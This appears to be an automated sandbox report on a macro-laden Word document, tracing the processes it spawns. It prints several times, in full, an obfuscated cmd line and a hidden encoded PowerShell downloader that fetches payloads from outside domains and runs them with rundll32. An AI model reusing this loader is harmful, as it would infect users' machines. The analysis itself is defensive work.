Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\msg.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lx8o0sz\Gztazkl\I11F.dll RunDll
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc UwBlAFQALQBpAHQARQBtACAAdgBhAFIASQBhAEIAbABFADoAdwAyAEgAQwAgACgAWwB0AHkAUABFAF0AKAAiAHsAMAB9AHsAMgB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBzAHkAUwB0ACcALAAnAHIARQBDAHQAbwBSAHkAJwAsACcAZQBNAC4AaQBvAC4AJwAsACcARABpACcAKQAgACkAIAAgADsAIAAgACAAcwBFAHQALQBpAHQAZQBtACAAKAAiAFYAQQByAGkAYQAiACsAIgBiAGwAZQA6ACIAKwAiAHMAIgArACIAOQBuADYAIgApACAAKAAgAFsAdAB5AHAAZQBdACgAIgB7ADQAfQB7ADAAfQB7ADcAfQB7ADUAfQB7ADgAfQB7ADMAfQB7ADYAfQB7ADIAfQB7ADEAfQAiAC0AZgAgACcAcwBUAEUAbQAuAG4AJwAsACcARQBSACcALAAnAG4AYQBnACcALAAnAGkAYwAnACwAJwBTAHkAJwAsACcALgAnACwAJwBFAFAAbwBpAE4AdABtAGEAJwAsACcARQBUACcALAAnAFMAZQByAHYAJwApACAAIAApADsAIAAkAFIAegBlADgAbQBzADEAPQAkAEwAXwA3AEYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFoANAAwAEoAOwAkAFUANQAxAEIAPQAoACgAJwBJACcAKwAnADgANgAnACkAKwAnAFkAJwApADsAIAAkAHcAMgBoAEMAOgA6ACIAYwByAEUAYQB0AGAAZQBEAGkAYABSAGUAYwB0AE8AYABSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBGAHAAJwArACgAJwBmAEwAJwArACcAeAA4ACcAKQArACgAJwBvACcAKwAnADAAcwAnACsAJwB6AEYAcAAnACkAKwAoACcAZgBHAHoAdABhACcAKwAnAHoAawAnACkAKwAoACcAbABGACcAKwAnAHAAJwApACsAJwBmACcAKQAtAHIARQBwAGwAYQBDAEUAIAAoACcARgAnACsAJwBwAGYAJwApACwAWwBDAGgAQQByAF0AOQAyACkAKQA7ACQAUQA4ADEAQgA9ACgAJwBYACcAKwAoACcANAAnACsAJwBfAFYAJwApACkAOwAgACQAUwA5AE4ANgA6ADoAIgBzAEUAYwB1AHIAYABpAGAAVABZAHAAUgBvAGAAVABPAGMATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABQADUANQBMAD0AKAAoACcASQAnACsAJwBfADYAJwApACsAJwBGACcAKQA7ACQATwBsAHYAdgB3AG4ANgAgAD0AIAAoACgAJwBJACcAKwAnADEAMQAnACkAKwAnAEYAJwApADsAJABJADgAMgBPAD0AKAAnAEkAJwArACgAJwAzADQAJwArACcAUgAnACkAKQA7ACQAVQBvADcAbwBsAHUAZQA9ACQASABPAE0ARQArACgAKAAoACcAYwBIACcAKwAnAHEAJwApACsAKAAnAEwAeAA4ACcAKwAnAG8AJwArACcAMABzACcAKQArACgAJwB6AGMASAAnACsAJwBxACcAKQArACgAJwBHAHoAdAAnACsAJwBhAHoAJwApACsAKAAnAGsAJwArACcAbABjAEgAcQAnACkAKQAgACAALQBSAGUAcABsAEEAQwBFACAAKABbAEMASABhAFIAXQA5ADkAKwBbAEMASABhAFIAXQA3ADIAKwBbAEMASABhAFIAXQAxADEAMwApACwAWwBDAEgAYQBSAF0AOQAyACkAKwAkAE8AbAB2AHYAdwBuADYAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFMAXwA2AFAAPQAoACcAUgAnACsAKAAnADUAMQAnACsAJwBOACcAKQApADsAJABHAHQAMABlAHMAMQB1AD0AKAAoACcAQQBdACcAKwAnAFsAJwArACcAcQBbAEQAJwApACsAJwA6AC8AJwArACgAJwAvAG0AJwArACcAYQBpACcAKQArACgAJwBsAC4AJwArACcAawAnACkAKwAnAHkAbwAnACsAJwBqACcAKwAnAGkAbgAnACsAKAAnAGMAJwArACcAbwBuAGQAJwApACsAJwB1AGkAJwArACcAdAAnACsAJwBzAC4AJwArACgAJwBjAG8AbQAvAGoAJwArACcAaABnAHUAJwArACcAbgAnACkAKwAoACcANwA1ACcAKwAnADMAJwApACsAKAAnAC4AegBpAHAAQABBAF0AWwAnACsAJwBxAFsARAAnACsAJwA6AC8ALwAnACkAKwAnAGEAJwArACgAJwBjAGMAdQByACcAKwAnAGEAdAAnACsAJwBlAGIAYwAnACkAKwAoACcALgBnAHIAJwArACcALwBlADAAbAB3ACcAKwAnADMAdAAuAHoAJwArACcAaQAnACkAKwAoACcAcABAACcAKwAnAEEAXQAnACkAKwAnAFsAcQAnACsAKAAnAFsARAAnACsAJwA6ACcAKQArACgAJwAvAC8AdAB1ACcAKwAnAG0AawAnACkAKwAoACcAdQB2AC4AbwAnACsAJwByACcAKQArACgAJwBnAC4AdAByAC8AJwArACcAegAnACsAJwBkADgAJwApACsAJwBkAHgAJwArACgAJwBiADIAdQAnACsAJwAuAHoAaQAnACsAJwBwACcAKQArACcAQAAnACsAKAAnAEEAJwArACcAXQBbACcAKQArACcAcQBbACcA
Source: unknownProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBlAFQALQBpAHQARQBtACAAdgBhAFIASQBhAEIAbABFADoAdwAyAEgAQwAgACgAWwB0AHkAUABFAF0AKAAiAHsAMAB9AHsAMgB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBzAHkAUwB0ACcALAAnAHIARQBDAHQAbwBSAHkAJwAsACcAZQBNAC4AaQBvAC4AJwAsACcARABpACcAKQAgACkAIAAgADsAIAAgACAAcwBFAHQALQBpAHQAZQBtACAAKAAiAFYAQQByAGkAYQAiACsAIgBiAGwAZQA6ACIAKwAiAHMAIgArACIAOQBuADYAIgApACAAKAAgAFsAdAB5AHAAZQBdACgAIgB7ADQAfQB7ADAAfQB7ADcAfQB7ADUAfQB7ADgAfQB7ADMAfQB7ADYAfQB7ADIAfQB7ADEAfQAiAC0AZgAgACcAcwBUAEUAbQAuAG4AJwAsACcARQBSACcALAAnAG4AYQBnACcALAAnAGkAYwAnACwAJwBTAHkAJwAsACcALgAnACwAJwBFAFAAbwBpAE4AdABtAGEAJwAsACcARQBUACcALAAnAFMAZQByAHYAJwApACAAIAApADsAIAAkAFIAegBlADgAbQBzADEAPQAkAEwAXwA3AEYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFoANAAwAEoAOwAkAFUANQAxAEIAPQAoACgAJwBJACcAKwAnADgANgAnACkAKwAnAFkAJwApADsAIAAkAHcAMgBoAEMAOgA6ACIAYwByAEUAYQB0AGAAZQBEAGkAYABSAGUAYwB0AE8AYABSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBGAHAAJwArACgAJwBmAEwAJwArACcAeAA4ACcAKQArACgAJwBvACcAKwAnADAAcwAnACsAJwB6AEYAcAAnACkAKwAoACcAZgBHAHoAdABhACcAKwAnAHoAawAnACkAKwAoACcAbABGACcAKwAnAHAAJwApACsAJwBmACcAKQAtAHIARQBwAGwAYQBDAEUAIAAoACcARgAnACsAJwBwAGYAJwApACwAWwBDAGgAQQByAF0AOQAyACkAKQA7ACQAUQA4ADEAQgA9ACgAJwBYACcAKwAoACcANAAnACsAJwBfAFYAJwApACkAOwAgACQAUwA5AE4ANgA6ADoAIgBzAEUAYwB1AHIAYABpAGAAVABZAHAAUgBvAGAAVABPAGMATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABQADUANQBMAD0AKAAoACcASQAnACsAJwBfADYAJwApACsAJwBGACcAKQA7ACQATwBsAHYAdgB3AG4ANgAgAD0AIAAoACgAJwBJACcAKwAnADEAMQAnACkAKwAnAEYAJwApADsAJABJADgAMgBPAD0AKAAnAEkAJwArACgAJwAzADQAJwArACcAUgAnACkAKQA7ACQAVQBvADcAbwBsAHUAZQA9ACQASABPAE0ARQArACgAKAAoACcAYwBIACcAKwAnAHEAJwApACsAKAAnAEwAeAA4ACcAKwAnAG8AJwArACcAMABzACcAKQArACgAJwB6AGMASAAnACsAJwBxACcAKQArACgAJwBHAHoAdAAnACsAJwBhAHoAJwApACsAKAAnAGsAJwArACcAbABjAEgAcQAnACkAKQAgACAALQBSAGUAcABsAEEAQwBFACAAKABbAEMASABhAFIAXQA5ADkAKwBbAEMASABhAFIAXQA3ADIAKwBbAEMASABhAFIAXQAxADEAMwApACwAWwBDAEgAYQBSAF0AOQAyACkAKwAkAE8AbAB2AHYAdwBuADYAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFMAXwA2AFAAPQAoACcAUgAnACsAKAAnADUAMQAnACsAJwBOACcAKQApADsAJABHAHQAMABlAHMAMQB1AD0AKAAoACcAQQBdACcAKwAnAFsAJwArACcAcQBbAEQAJwApACsAJwA6AC8AJwArACgAJwAvAG0AJwArACcAYQBpACcAKQArACgAJwBsAC4AJwArACcAawAnACkAKwAnAHkAbwAnACsAJwBqACcAKwAnAGkAbgAnACsAKAAnAGMAJwArACcAbwBuAGQAJwApACsAJwB1AGkAJwArACcAdAAnACsAJwBzAC4AJwArACgAJwBjAG8AbQAvAGoAJwArACcAaABnAHUAJwArACcAbgAnACkAKwAoACcANwA1ACcAKwAnADMAJwApACsAKAAnAC4AegBpAHAAQABBAF0AWwAnACsAJwBxAFsARAAnACsAJwA6AC8ALwAnACkAKwAnAGEAJwArACgAJwBjAGMAdQByACcAKwAnAGEAdAAnACsAJwBlAGIAYwAnACkAKwAoACcALgBnAHIAJwArACcALwBlADAAbAB3ACcAKwAnADMAdAAuAHoAJwArACcAaQAnACkAKwAoACcAcABAACcAKwAnAEEAXQAnACkAKwAnAFsAcQAnACsAKAAnAFsARAAnACsAJwA6ACcAKQArACgAJwAvAC8AdAB1ACcAKwAnAG0AawAnACkAKwAoACcAdQB2AC4AbwAnACsAJwByACcAKQArACgAJwBnAC4AdAByAC8AJwArACcAegAnACsAJwBkADgAJwApACsAJwBkAHgAJwArACgAJwBiADIAdQAnACsAJwAuAHoAaQAnACsAJwBwACcAKQArACcAQAAnACsAKAAnAEEAJwArACcAXQBbACcAKQArACcAcQBbACcAKwAnAEQAOgAnACsAJwAvAC8AJwArACcAdAAnACsAJwBoAGUAJwArACgAJwB3ACcAKwAnAG
Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lx8o0sz\Gztazkl\I11F.dll RunDll
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lx8o0sz\Gztazkl\I11F.dll RunDll
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBlAFQALQBpAHQARQBtACAAdgBhAFIASQBhAEIAbABFADoAdwAyAEgAQwAgACgAWwB0AHkAUABFAF0AKAAiAHsAMAB9AHsAMgB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBzAHkAUwB0ACcALAAnAHIARQBDAHQAbwBSAHkAJwAsACcAZQBNAC4AaQBvAC4AJwAsACcARABpACcAKQAgACkAIAAgADsAIAAgACAAcwBFAHQALQBpAHQAZQBtACAAKAAiAFYAQQByAGkAYQAiACsAIgBiAGwAZQA6ACIAKwAiAHMAIgArACIAOQBuADYAIgApACAAKAAgAFsAdAB5AHAAZQBdACgAIgB7ADQAfQB7ADAAfQB7ADcAfQB7ADUAfQB7ADgAfQB7ADMAfQB7ADYAfQB7ADIAfQB7ADEAfQAiAC0AZgAgACcAcwBUAEUAbQAuAG4AJwAsACcARQBSACcALAAnAG4AYQBnACcALAAnAGkAYwAnACwAJwBTAHkAJwAsACcALgAnACwAJwBFAFAAbwBpAE4AdABtAGEAJwAsACcARQBUACcALAAnAFMAZQByAHYAJwApACAAIAApADsAIAAkAFIAegBlADgAbQBzADEAPQAkAEwAXwA3AEYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFoANAAwAEoAOwAkAFUANQAxAEIAPQAoACgAJwBJACcAKwAnADgANgAnACkAKwAnAFkAJwApADsAIAAkAHcAMgBoAEMAOgA6ACIAYwByAEUAYQB0AGAAZQBEAGkAYABSAGUAYwB0AE8AYABSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBGAHAAJwArACgAJwBmAEwAJwArACcAeAA4ACcAKQArACgAJwBvACcAKwAnADAAcwAnACsAJwB6AEYAcAAnACkAKwAoACcAZgBHAHoAdABhACcAKwAnAHoAawAnACkAKwAoACcAbABGACcAKwAnAHAAJwApACsAJwBmACcAKQAtAHIARQBwAGwAYQBDAEUAIAAoACcARgAnACsAJwBwAGYAJwApACwAWwBDAGgAQQByAF0AOQAyACkAKQA7ACQAUQA4ADEAQgA9ACgAJwBYACcAKwAoACcANAAnACsAJwBfAFYAJwApACkAOwAgACQAUwA5AE4ANgA6ADoAIgBzAEUAYwB1AHIAYABpAGAAVABZAHAAUgBvAGAAVABPAGMATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABQADUANQBMAD0AKAAoACcASQAnACsAJwBfADYAJwApACsAJwBGACcAKQA7ACQATwBsAHYAdgB3AG4ANgAgAD0AIAAoACgAJwBJACcAKwAnADEAMQAnACkAKwAnAEYAJwApADsAJABJADgAMgBPAD0AKAAnAEkAJwArACgAJwAzADQAJwArACcAUgAnACkAKQA7ACQAVQBvADcAbwBsAHUAZQA9ACQASABPAE0ARQArACgAKAAoACcAYwBIACcAKwAnAHEAJwApACsAKAAnAEwAeAA4ACcAKwAnAG8AJwArACcAMABzACcAKQArACgAJwB6AGMASAAnACsAJwBxACcAKQArACgAJwBHAHoAdAAnACsAJwBhAHoAJwApACsAKAAnAGsAJwArACcAbABjAEgAcQAnACkAKQAgACAALQBSAGUAcABsAEEAQwBFACAAKABbAEMASABhAFIAXQA5ADkAKwBbAEMASABhAFIAXQA3ADIAKwBbAEMASABhAFIAXQAxADEAMwApACwAWwBDAEgAYQBSAF0AOQAyACkAKwAkAE8AbAB2AHYAdwBuADYAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFMAXwA2AFAAPQAoACcAUgAnACsAKAAnADUAMQAnACsAJwBOACcAKQApADsAJABHAHQAMABlAHMAMQB1AD0AKAAoACcAQQBdACcAKwAnAFsAJwArACcAcQBbAEQAJwApACsAJwA6AC8AJwArACgAJwAvAG0AJwArACcAYQBpACcAKQArACgAJwBsAC4AJwArACcAawAnACkAKwAnAHkAbwAnACsAJwBqACcAKwAnAGkAbgAnACsAKAAnAGMAJwArACcAbwBuAGQAJwApACsAJwB1AGkAJwArACcAdAAnACsAJwBzAC4AJwArACgAJwBjAG8AbQAvAGoAJwArACcAaABnAHUAJwArACcAbgAnACkAKwAoACcANwA1ACcAKwAnADMAJwApACsAKAAnAC4AegBpAHAAQABBAF0AWwAnACsAJwBxAFsARAAnACsAJwA6AC8ALwAnACkAKwAnAGEAJwArACgAJwBjAGMAdQByACcAKwAnAGEAdAAnACsAJwBlAGIAYwAnACkAKwAoACcALgBnAHIAJwArACcALwBlADAAbAB3ACcAKwAnADMAdAAuAHoAJwArACcAaQAnACkAKwAoACcAcABAACcAKwAnAEEAXQAnACkAKwAnAFsAcQAnACsAKAAnAFsARAAnACsAJwA6ACcAKQArACgAJwAvAC8AdAB1ACcAKwAnAG0AawAnACkAKwAoACcAdQB2AC4AbwAnACsAJwByACcAKQArACgAJwBnAC4AdAByAC8AJwArACcAegAnACsAJwBkADgAJwApACsAJwBkAHgAJwArACgAJwBiADIAdQAnACsAJwAuAHoAaQAnACsAJwBwACcAKQArACcAQAAnACsAKAAnAEEAJwArACcAXQBbACcAKQArACcAcQBbACcAKwAnAEQAOgAnACsAJwAvAC8AJwArACcAdAAnACsAJwBoAGUAJwArACgAJwB3ACcAKwAnAG
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lx8o0sz\Gztazkl\I11F.dll RunDll
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lx8o0sz\Gztazkl\I11F.dll RunDll
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2089688133.0000000001D57000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2089688133.0000000001D57000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2089688133.0000000001D57000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2089688133.0000000001D57000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2089688133.0000000001D57000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2089688133.0000000001D57000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2089799072.0000000001F40000.00000002.00000001.sdmp
Source: Order.802796810.docInitial sample: OLE summary subject = bandwidth-monitored strategize Investment Account Well Small full-range Product

Data Obfuscation:

barindex
Document contains an embedded VBA with many GOTO operations indicating source code obfuscationShow sources
Source: Order.802796810.docStream path 'Macros/VBA/Ty191wz8hynv3fl' : High number of GOTO operations
Source: VBA code instrumentationOLE, VBA macro, High number of GOTO operations: Module Ty191wz8hynv3fl
Document contains an embedded VBA with many randomly named variablesShow sources
Source: Order.802796810.docStream path 'Macros/VBA/Ty191wz8hynv3fl' : High entropy of concatenated variable names
Obfuscated command line foundShow sources
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc UwBlAFQALQBpAHQARQBtACAAdgBhAFIASQBhAEIAbABFADoAdwAyAEgAQwAgACgAWwB0AHkAUABFAF0AKAAiAHsAMAB9AHsAMgB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBzAHkAUwB0ACcALAAnAHIARQBDAHQAbwBSAHkAJwAsACcAZQBNAC4AaQBvAC4AJwAsACcARABpACcAKQAgACkAIAAgADsAIAAgACAAcwBFAHQALQBpAHQAZQBtACAAKAAiAFYAQQByAGkAYQAiACsAIgBiAGwAZQA6ACIAKwAiAHMAIgArACIAOQBuADYAIgApACAAKAAgAFsAdAB5AHAAZQBdACgAIgB7ADQAfQB7ADAAfQB7ADcAfQB7ADUAfQB7ADgAfQB7ADMAfQB7ADYAfQB7ADIAfQB7ADEAfQAiAC0AZgAgACcAcwBUAEUAbQAuAG4AJwAsACcARQBSACcALAAnAG4AYQBnACcALAAnAGkAYwAnACwAJwBTAHkAJwAsACcALgAnACwAJwBFAFAAbwBpAE4AdABtAGEAJwAsACcARQBUACcALAAnAFMAZQByAHYAJwApACAAIAApADsAIAAkAFIAegBlADgAbQBzADEAPQAkAEwAXwA3AEYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFoANAAwAEoAOwAkAFUANQAxAEIAPQAoACgAJwBJACcAKwAnADgANgAnACkAKwAnAFkAJwApADsAIAAkAHcAMgBoAEMAOgA6ACIAYwByAEUAYQB0AGAAZQBEAGkAYABSAGUAYwB0AE8AYABSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBGAHAAJwArACgAJwBmAEwAJwArACcAeAA4ACcAKQArACgAJwBvACcAKwAnADAAcwAnACsAJwB6AEYAcAAnACkAKwAoACcAZgBHAHoAdABhACcAKwAnAHoAawAnACkAKwAoACcAbABGACcAKwAnAHAAJwApACsAJwBmACcAKQAtAHIARQBwAGwAYQBDAEUAIAAoACcARgAnACsAJwBwAGYAJwApACwAWwBDAGgAQQByAF0AOQAyACkAKQA7ACQAUQA4ADEAQgA9ACgAJwBYACcAKwAoACcANAAnACsAJwBfAFYAJwApACkAOwAgACQAUwA5AE4ANgA6ADoAIgBzAEUAYwB1AHIAYABpAGAAVABZAHAAUgBvAGAAVABPAGMATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABQADUANQBMAD0AKAAoACcASQAnACsAJwBfADYAJwApACsAJwBGACcAKQA7ACQATwBsAHYAdgB3AG4ANgAgAD0AIAAoACgAJwBJACcAKwAnADEAMQAnACkAKwAnAEYAJwApADsAJABJADgAMgBPAD0AKAAnAEkAJwArACgAJwAzADQAJwArACcAUgAnACkAKQA7ACQAVQBvADcAbwBsAHUAZQA9ACQASABPAE0ARQArACgAKAAoACcAYwBIACcAKwAnAHEAJwApACsAKAAnAEwAeAA4ACcAKwAnAG8AJwArACcAMABzACcAKQArACgAJwB6AGMASAAnACsAJwBxACcAKQArACgAJwBHAHoAdAAnACsAJwBhAHoAJwApACsAKAAnAGsAJwArACcAbABjAEgAcQAnACkAKQAgACAALQBSAGUAcABsAEEAQwBFACAAKABbAEMASABhAFIAXQA5ADkAKwBbAEMASABhAFIAXQA3ADIAKwBbAEMASABhAFIAXQAxADEAMwApACwAWwBDAEgAYQBSAF0AOQAyACkAKwAkAE8AbAB2AHYAdwBuADYAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFMAXwA2AFAAPQAoACcAUgAnACsAKAAnADUAMQAnACsAJwBOACcAKQApADsAJABHAHQAMABlAHMAMQB1AD0AKAAoACcAQQBdACcAKwAnAFsAJwArACcAcQBbAEQAJwApACsAJwA6AC8AJwArACgAJwAvAG0AJwArACcAYQBpACcAKQArACgAJwBsAC4AJwArACcAawAnACkAKwAnAHkAbwAnACsAJwBqACcAKwAnAGkAbgAnACsAKAAnAGMAJwArACcAbwBuAGQAJwApACsAJwB1AGkAJwArACcAdAAnACsAJwBzAC4AJwArACgAJwBjAG8AbQAvAGoAJwArACcAaABnAHUAJwArACcAbgAnACkAKwAoACcANwA1ACcAKwAnADMAJwApACsAKAAnAC4AegBpAHAAQABBAF0AWwAnACsAJwBxAFsARAAnACsAJwA6AC8ALwAnACkAKwAnAGEAJwArACgAJwBjAGMAdQByACcAKwAnAGEAdAAnACsAJwBlAGIAYwAnACkAKwAoACcALgBnAHIAJwArACcALwBlADAAbAB3ACcAKwAnADMAdAAuAHoAJwArACcAaQAnACkAKwAoACcAcABAACcAKwAnAEEAXQAnACkAKwAnAFsAcQAnACsAKAAnAFsARAAnACsAJwA6ACcAKQArACgAJwAvAC8AdAB1ACcAKwAnAG0AawAnACkAKwAoACcAdQB2AC4AbwAnACsAJwByACcAKQArACgAJwBnAC4AdAByAC8AJwArACcAegAnACsAJwBkADgAJwApACsAJwBkAHgAJwArACgAJwBiADIAdQAnACsAJwAuAHoAaQAnACsAJwBwACcAKQArACcAQAAnACsAKAAnAEEAJwArACcAXQBbACcAKQArACcAcQBbACcA
Suspicious powershell command line foundShow sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBlAFQALQBpAHQARQBtACAAdgBhAFIASQBhAEIAbABFADoAdwAyAEgAQwAgACgAWwB0AHkAUABFAF0AKAAiAHsAMAB9AHsAMgB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBzAHkAUwB0ACcALAAnAHIARQBDAHQAbwBSAHkAJwAsACcAZQBNAC4AaQBvAC4AJwAsACcARABpACcAKQAgACkAIAAgADsAIAAgACAAcwBFAHQALQBpAHQAZQBtACAAKAAiAFYAQQByAGkAYQAiACsAIgBiAGwAZQA6ACIAKwAiAHMAIgArACIAOQBuADYAIgApACAAKAAgAFsAdAB5AHAAZQBdACgAIgB7ADQAfQB7ADAAfQB7ADcAfQB7ADUAfQB7ADgAfQB7ADMAfQB7ADYAfQB7ADIAfQB7ADEAfQAiAC0AZgAgACcAcwBUAEUAbQAuAG4AJwAsACcARQBSACcALAAnAG4AYQBnACcALAAnAGkAYwAnACwAJwBTAHkAJwAsACcALgAnACwAJwBFAFAAbwBpAE4AdABtAGEAJwAsACcARQBUACcALAAnAFMAZQByAHYAJwApACAAIAApADsAIAAkAFIAegBlADgAbQBzADEAPQAkAEwAXwA3AEYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFoANAAwAEoAOwAkAFUANQAxAEIAPQAoACgAJwBJACcAKwAnADgANgAnACkAKwAnAFkAJwApADsAIAAkAHcAMgBoAEMAOgA6ACIAYwByAEUAYQB0AGAAZQBEAGkAYABSAGUAYwB0AE8AYABSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBGAHAAJwArACgAJwBmAEwAJwArACcAeAA4ACcAKQArACgAJwBvACcAKwAnADAAcwAnACsAJwB6AEYAcAAnACkAKwAoACcAZgBHAHoAdABhACcAKwAnAHoAawAnACkAKwAoACcAbABGACcAKwAnAHAAJwApACsAJwBmACcAKQAtAHIARQBwAGwAYQBDAEUAIAAoACcARgAnACsAJwBwAGYAJwApACwAWwBDAGgAQQByAF0AOQAyACkAKQA7ACQAUQA4ADEAQgA9ACgAJwBYACcAKwAoACcANAAnACsAJwBfAFYAJwApACkAOwAgACQAUwA5AE4ANgA6ADoAIgBzAEUAYwB1AHIAYABpAGAAVABZAHAAUgBvAGAAVABPAGMATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABQADUANQBMAD0AKAAoACcASQAnACsAJwBfADYAJwApACsAJwBGACcAKQA7ACQATwBsAHYAdgB3AG4ANgAgAD0AIAAoACgAJwBJACcAKwAnADEAMQAnACkAKwAnAEYAJwApADsAJABJADgAMgBPAD0AKAAnAEkAJwArACgAJwAzADQAJwArACcAUgAnACkAKQA7ACQAVQBvADcAbwBsAHUAZQA9ACQASABPAE0ARQArACgAKAAoACcAYwBIACcAKwAnAHEAJwApACsAKAAnAEwAeAA4ACcAKwAnAG8AJwArACcAMABzACcAKQArACgAJwB6AGMASAAnACsAJwBxACcAKQArACgAJwBHAHoAdAAnACsAJwBhAHoAJwApACsAKAAnAGsAJwArACcAbABjAEgAcQAnACkAKQAgACAALQBSAGUAcABsAEEAQwBFACAAKABbAEMASABhAFIAXQA5ADkAKwBbAEMASABhAFIAXQA3ADIAKwBbAEMASABhAFIAXQAxADEAMwApACwAWwBDAEgAYQBSAF0AOQAyACkAKwAkAE8AbAB2AHYAdwBuADYAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFMAXwA2AFAAPQAoACcAUgAnACsAKAAnADUAMQAnACsAJwBOACcAKQApADsAJABHAHQAMABlAHMAMQB1AD0AKAAoACcAQQBdACcAKwAnAFsAJwArACcAcQBbAEQAJwApACsAJwA6AC8AJwArACgAJwAvAG0AJwArACcAYQBpACcAKQArACgAJwBsAC4AJwArACcAawAnACkAKwAnAHkAbwAnACsAJwBqACcAKwAnAGkAbgAnACsAKAAnAGMAJwArACcAbwBuAGQAJwApACsAJwB1AGkAJwArACcAdAAnACsAJwBzAC4AJwArACgAJwBjAG8AbQAvAGoAJwArACcAaABnAHUAJwArACcAbgAnACkAKwAoACcANwA1ACcAKwAnADMAJwApACsAKAAnAC4AegBpAHAAQABBAF0AWwAnACsAJwBxAFsARAAn